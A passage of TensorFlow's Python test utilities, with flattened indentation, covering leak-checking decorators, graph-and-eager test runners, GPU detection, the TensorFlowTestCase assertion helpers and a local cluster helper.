"""Adds methods that call original methods but with C API enabled.
Note this enables the C API in new methods after running the test class's
setup method. This can be a problem if some objects are created in it
before the C API is enabled.
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
# If the C API is already enabled, don't do anything. Some tests break if the
# same test is run twice, so this allows us to turn on the C API by default
# without breaking these tests.
if ops._USE_C_API: return cls
for name, value in cls.__dict__.copy().items():
if callable(value) and name.startswith("test"):
setattr(cls, name + "WithCApi", enable_c_api(value))
return cls
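# Illustrative sketch (not part of the original module): decorating a hypothetical
# test class with with_c_api adds a "...WithCApi" twin for every test method,
# unless the C API is already enabled by default.
def _example_with_c_api_usage():
  @with_c_api
  class _HypotheticalCApiTest(googletest.TestCase):
    def testSomething(self):
      pass
  return _HypotheticalCApiTest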
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensor(obj):
try:
return (isinstance(obj, ops.Tensor) or
isinstance(obj, variables.Variable))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(id(obj) for obj in gc.get_objects() if _is_tensor(obj))
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
ops.get_default_graph()._graph_key = outside_graph_key
f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
backprop._zeros_cache.flush()
context.get_default_context().ones_rank_cache().flush()
context.get_default_context().scalar_cache().clear()
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensor(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return decorator
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
f(self, **kwargs)
gc.collect()
if len(gc.garbage) > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error(
"Object %d of %d" % (i, len(gc.garbage) - previous_garbage))
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s" % (_safe_object_str(obj),))
logging.error(" Referrer types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referrers(obj)]),))
logging.error(" Referent types: %s" % (
', '.join([_safe_object_str(ref)
for ref in gc.get_referents(obj)]),))
logging.error(" Object attribute names: %s" % (dir(obj),))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception:
logging.error("(Exception while printing object)")
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, len(gc.garbage))
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return decorator
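# Illustrative sketch (not part of the original module): the two decorators above
# compose, so a single hypothetical test method can be checked both for leaked
# Tensors and for newly created garbage.
def _example_leak_checked_method():
  @assert_no_new_tensors
  @assert_no_garbage_created
  def testNothingLeaks(self):
    pass
  return testNothingLeaks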
def run_in_graph_and_eager_modes(__unused__=None,
graph=None,
config=None,
use_gpu=False,
force_gpu=False,
reset_test=True,
assert_no_eager_garbage=False):
"""Runs the test in both graph and eager modes.
Args:
    __unused__: Prevents silently skipping tests.
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
reset_test: If True, tearDown and SetUp the test case again.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test in eager mode. This will fail if there are reference cycles
(e.g. a = []; a.append(a)). Off by default because some tests may create
garbage for legitimate reasons (e.g. they define a class which inherits
from `object`), and because DEBUG_SAVEALL is sticky in some Python
interpreters (meaning that tests which rely on objects being collected
elsewhere in the unit test file will not work). Additionally, checks that
nothing still has a reference to Tensors that the test allocated.
Returns:
Returns a decorator that will run the decorated test function
using both a graph and using eager execution.
"""
assert not __unused__, "Add () after run_in_graph_and_eager_modes."
def decorator(f):
"""Test method decorator."""
def decorated(self, **kwargs):
"""Decorated the test method."""
with context.graph_mode():
with self.test_session(graph, config, use_gpu, force_gpu):
f(self, **kwargs)
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
self.setUp()
def run_eager_mode(self, **kwargs):
if force_gpu:
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with context.device(gpu_name):
f(self)
elif use_gpu:
# TODO(xpan): Support softplacement and gpu by default when available.
f(self, **kwargs)
else:
with context.device("/device:CPU:0"):
f(self, **kwargs)
if assert_no_eager_garbage:
run_eager_mode = assert_no_new_tensors(
assert_no_garbage_created(run_eager_mode))
with context.eager_mode():
with ops.Graph().as_default():
run_eager_mode(self, **kwargs)
return decorated
return decorator
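# Illustrative sketch (not part of the original module): the decorator is applied
# with parentheses to a TensorFlowTestCase method; the class and assertion below
# are hypothetical.
#
#   class HypotheticalModesTest(TensorFlowTestCase):
#
#     @run_in_graph_and_eager_modes()
#     def testBasicMath(self):
#       self.assertEqual(2 + 2, 4)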
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Args:
cuda_only: limit the search to CUDA gpus.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Returns:
True iff a gpu device of the requested kind is available.
"""
def compute_capability_from_device_desc(device_desc):
# TODO(jingyue): The device description generator has to be in sync with
# this file. Another option is to put compute capability in
# DeviceAttributes, but I avoided that to keep DeviceAttributes
# target-independent. Reconsider this option when we have more things like
# this to keep in sync.
# LINT.IfChange
match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
# LINT.ThenChange(//tensorflow/core/\
# common_runtime/gpu/gpu_device.cc)
if not match:
return 0, 0
return int(match.group(1)), int(match.group(2))
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
if (min_cuda_compute_capability is None or
compute_capability_from_device_desc(local_device.physical_device_desc)
>= min_cuda_compute_capability):
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
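# Illustrative sketch (not part of the original module): `device` lets graph-building
# code be written once and placed on the GPU only when one was requested and is
# actually available. `build_fn` below is a hypothetical callable.
def _example_device_usage(build_fn, use_gpu=False):
  with device(use_gpu):
    return build_fn()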
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times in a test, it will return the
    same folder. However, across different runs the directories will be
    different. This will ensure that across different runs tests will not be
    able to pollute each other's environment.
    If you need multiple unique directories within a single test, you should
    use tempfile.mkdtemp as follows:
      tempfile.mkdtemp(dir=self.get_temp_dir())
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
      self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
    This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
    Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
    the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
            self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
        new_config = config_pb2.ConfigProto()
        new_config.CopyFrom(config)
        config = new_config
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
      self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
      RuntimeError: If the thread is not terminated. This means the thread was
        not joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
    Checks that |f1 - f2| <= err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg=msg, equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, dict)
if a_is_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
      # Try to directly compare a, b as ndarrays; if that does not work, then
      # traverse through the sequence, which is more expensive.
try:
a_as_ndarray = np.array(a)
b_as_ndarray = np.array(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s." % (path_str,
path_str))
except TypeError as e:
msg = "Error: a%s has %s, but b%s has %s" % (
path_str, type(a), path_str, type(b))
e.args = ((e.args[0] + ' : ' + msg,) + e.args[1:])
raise
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray`, or any arbitrarily nested structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray`, or any arbitrarily nested structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
    In particular, the tolerance is relaxed to 1e-3 if at least
    one of the arguments is of type float16.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
    # Types with looser (lower precision) tolerances are applied later so they
    # take precedence over the earlier, tighter ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays have the same values.
Args:
      a: the expected numpy ndarray or anything that can be converted to one.
      b: the actual numpy ndarray or anything that can be converted to one.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b, err_msg=msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal. %s" %
(device1, device2, msg))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
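# Illustrative sketch (not part of the original module): a typical lookup serializes
# the current graph and searches it by node name; the node name below is
# hypothetical.
def _example_get_node_def(graph):
  graph_def = graph.as_graph_def()
  return get_node_def_from_graph("hypothetical_node", graph_def)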
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
